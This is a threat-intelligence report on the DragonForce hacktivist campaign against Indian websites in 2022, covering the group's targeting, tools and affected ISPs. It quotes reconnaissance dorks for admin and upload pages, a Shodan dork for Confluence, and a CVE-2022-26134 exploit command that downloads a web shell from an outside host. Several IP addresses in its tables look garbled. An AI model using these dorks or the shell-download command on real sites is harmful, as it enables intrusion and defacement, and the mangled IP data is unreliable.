- On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by the Malaysian hacktivist group, DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
- The group’s primary objective of the attack was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
- Since then, the group and its supporters have compromised more than 3,000 government and non-government organizations, military websites, and private entities.
- The compromised entities include BJP (the ruling party of India), Army veteran websites, academic institutes, etc.
- The group uses two DNS servers, “annabel.ns.cloudflare.com” and “nicolas.ns.cloudflare.com” with 220.127.116.11, and 18.104.22.168 being the IP addresses of the servers respectively.
- It was discovered that the DragonForce domain was hosted along with multiple Russian, Australian, Chinese, and other websites alongside multiple adult domains.
Techniques, Tactics, & Procedures (TTPs)
The three primary attack vectors used by the group and its supporters are as follows and as expressed in the flow diagram:
- Google Dorking
- Shodan Dorks
- DDoS Attacks
- Google Dorks are the primary source of the group’s targets, which is confirmed from the following image of a Tiktok video made by one of DragonForce’s allies:
- The Google Dorks list included dorks for finding various educational institutions, wherein dorks relating to academic and campus logins were found.
- The full list contains around 360 google dorks which could have been abused for numerous malicious purposes. A few significant dorks from the list are mentioned:
|inurl:/admin/upload/ : Ministry of Knowledge & Resource sharing||inurl: /login/login.php admin: For Admin logins into websites using PHP language|
|“allowed file types: png gif jpg txt site:gov.in” : Google dork to upload shell html files into the server||php?id= site:in: Indian sites with ID parameter that can be abused and URL manipulation could be performed|
|inurl/mnux = campus login : Academic institutions with Campus login parameter||inurl/mnux = academic login : Academic institutions with Academic login parameter|
|inurl/mnux = administrative academic login : Academic institutions with Administrative academic login parameter||inurl: /admin/cp.php : Reveals all sites with Control panel which can provide access to the server.|
|inurl:admin/upload.php : For sites with upload feature that actors could exploit for shell using script deface|
- A PoC was shared for the exploit of the Atlassian Confluence vulnerability along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:”IN”
- The actor also shared a GitHub repository script which can be downloaded and exploited using the following python command:
|CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php|
- The group invited its members and other users on the forum to conduct the DDoS attack where they shared an infographic stating the website, IP addresses, and the port of the target.
- The group used a tool called HTTPFLOOD (aka “./404FOUND.MY”), which manipulates and posts unwanted requests to bring down a web server or application. The tool has been built in Python language and it takes the following three inputs:
- A target URL
- A Proxy list
- Number of threads (i.e count of requests to be sent to the server)
- Further analysis found that the user ‘SKYSG404’ built the HTTPFLOOD tool, and that both the tool and the Github account hosting it were created on 12 June 2022.
- It was observed that a large number of domains being targeted, resolved to a common IP where they were hosted.
- The attackers appeared to have gained access to the server via an injection vulnerability on one of the websites.
- Once a server is compromised, all the websites hosted on it easily fall prey to the attackers, as seen in the pie chart below.
- As witnessed in the table given below, almost 61% of the domains compromised belonged to E2ENetworks.in which is based in Delhi, India.
- Another major chunk, 20.8%, of hacked domains belonged to Atria Convergence Technologies Pvt. Ltd.
- Jointly, both of these ISPs constitute around 81% of the compromised websites.
Share of Domain names resolving to common IP and ISP Information
|IP||Percentage||Location||Name of ISP|
|22.214.171.124||40.1||Saidabad, New Delhi, India||E2ENetworks.in|
|126.96.36.199||20.8||Saidabad, New Delhi, India||E2ENetworks.in|
|Lucknow, Uttar Pradesh, India||Atria Convergence Technologies pvt ltd|
|188.8.131.52||8.2||Valsad, Gujarat, India||SHREENET|
|184.108.40.206||4.8||Mumbai, India||Netmagic Datacenter Mumbai|